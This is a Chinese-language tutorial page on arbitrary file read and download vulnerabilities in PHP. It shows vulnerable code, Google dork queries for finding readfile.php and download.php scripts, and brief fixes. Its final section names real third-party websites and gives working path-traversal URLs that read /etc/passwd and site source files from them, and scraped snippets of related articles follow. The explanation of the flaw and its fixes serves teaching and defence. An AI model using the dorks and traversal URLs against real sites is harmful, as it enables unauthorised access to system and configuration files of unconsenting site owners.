任意文件读取与下载

0x00 背景介绍

一些网站的业务需要,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源文件,敏感文件等等

0x01 文件读取

文件读取在PHP这种可以有很多种方式实现,在web的默认情况下,$filename变量可能用户可控

<?php
$filename = $_GET[‘f‘];
echo file_get_contents($filename);
?>
#当变量 $filename 没有经过校验,或者校验不严格,用户可以控制这个变量读取任意文件,例如
/etc/passwd、/config.ini 等文件

0x02 实现文件下载的两种方式

1.直接下载:

<a href="http://www.xxx.com/xxx.rar"></a>

2.增加header头

<?php
$filename = $_GET[‘f‘];
header(‘Content-Type:image/gif‘);
header(‘Content-Disposition:attachment;filename=‘.$filename);
header(‘Content-Length:‘.filesize($filename));
readfile($filename);
?>

当$filename没有经过校验,或者校验不合格,用户可以控制这个变量下载任意文件,比如/etc/passwd,./index.php、等等就造成了任意文件下载漏洞。

0x03 成因

都有读取文件的函数

读物文件的路径用户可控,且没有经过校验,或者校验不严格

都输出文件内容

0x04 Google Serch

inurl:"readfile.php?file="
inurl:"download.php?file="

0x05 修复方案

过滤<.>(点)

正则判断用户输入的参数格式,匹配输入的格式是否合格

php.ini配置open_basedir

0x06 实例漏洞利用

(仅供测试,请勿随意破坏)

地址:

url:http://hypnet.org.uk/shared/readfile.php?file=mental_health_audit_2014_06_15_130552.ppt

漏洞利用:

http://hypnet.org.uk/shared/readfile.php?file=../../../../../../../../../../etc/passwd

地址:

url:http://storiedifarina.it/readfile.php?file=pdf/storiedifarina.pdf

漏洞利用

http://www.wodehouse.se/upload/readfile.php?file=../index.php
时间: 2024-10-18 18:57:42

任意文件读取与下载的相关文章

任意文件查看与下载漏洞

*背景介绍* 一些网站的业务需求,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源代码文件.敏感文件等等. *任意文件读取* 代码形式可如下几种 *任意文件下载* 直接下载: 用header下载 *漏洞利用代码* *Googele search* *漏洞验证* *漏洞防御* 啦啦啦啦啦啦啦啦啦啦~~~~~

PHPMailer命令执行及任意文件读取漏洞

今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下. PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033

【代码审计】两个任意文件读取漏洞实例

0x00 前言 0x01 漏洞实例一 环境搭建: XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:https://pan.baidu.com/s/13q_ITM0pPTGlkaNv8uq2Iw 代码分析: 1.漏洞文件位置:/App/Manage/Controller/TempletsController.class.php 第59-83行: public function edit() { $ft

1.3 任意文件查看与下载漏洞

任意文件查看与下载漏洞 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件 不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞 利用条件 * 存在读文件的函数 * 读取文件的路径用户可控且未校验或校验不严 * 输出了文件内容 漏洞危害 下载服务器任意文件,如脚本代码.服务及系统配置文件等 可用得到的代码进一步代码审计,得到更多可利用漏洞 任意文件读取 代码形式可如下几种: <?php $filename = "test.t

审计 6 SSRF和任意文件读取

1 <?php 2 error_reporting(0); 3 session_start(); 4 header("Content-type:image/jpeg"); 5 echo file_get_contents($_SESSION['avatar']); 6 ?> 在第5行发现    读取的文件后,将文件进行了输出.  所以猜测此处可能存在SSRF 和  任意文件读取 搜索关键变量$_SESSION['avatar']  发现在登陆 和修改密码 读取了改变量,而上

TEC-004-php文件下载任意文件读取漏洞修复

修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd    function download() {        $u =$_GET['u'];        // 描述: 任意文件读取漏洞修复  date: 2017年4月28日 下午4:13:39  bylwy        $lenth=strrpos($u,'.');        $string = sub

feifeicms后台任意文件读取

前台大略看了下,本身内容比较简单,经过"洗礼"后以及没什么问题了,基本上输入都过滤了. 这次审计找到了一个后台的任意文件读取,可以读取数据库配置文件. 在DataAction.class.php文件中,获取了$_GET['id']并直接用于路径拼凑,最后到达readfile函数中,导致了任意文件读取漏洞. 访问localhost/feifeicms/index.php?s=Admin-Data-down&id=../../Conf/config.php 需要后台权限,有点鸡肋.

python从任意文件读取邮件地址输出的代码

如下的资料是关于python从任意文件读取邮件地址输出的代码. # This script takes whatever you throw at stdin and outputs email addresses.# eg. python email_extractor.py < PythonFAQ.html# This script can be used for whatever you want, EXCEPT SPAMMING !import sys,reprint 'n'.join(

【CVE-2020-1938】Tomcat AJP 任意文件读取和包含漏洞分析记录

0x00 前言 2020年2月20日傍晚,在某群看到有群友问CNVD的tomcat文件包含漏洞有什么消息没 接着看到安恒信息应急响应中心公众号发了个漏洞公告 随后chy师傅也在群里发了个阿里云的公告链接 根据安恒和阿里云公告给出的信息我们知道是tomcat ajp服务出了问题,但具体是哪里出了问题却不知道.(这个时候我就在想阿里云是怎么知道ajp服务出了问题的呢? 以tomcat7为例给出的修复版本是100,遂去github看commit,看100版本release之前的commit记录. 0x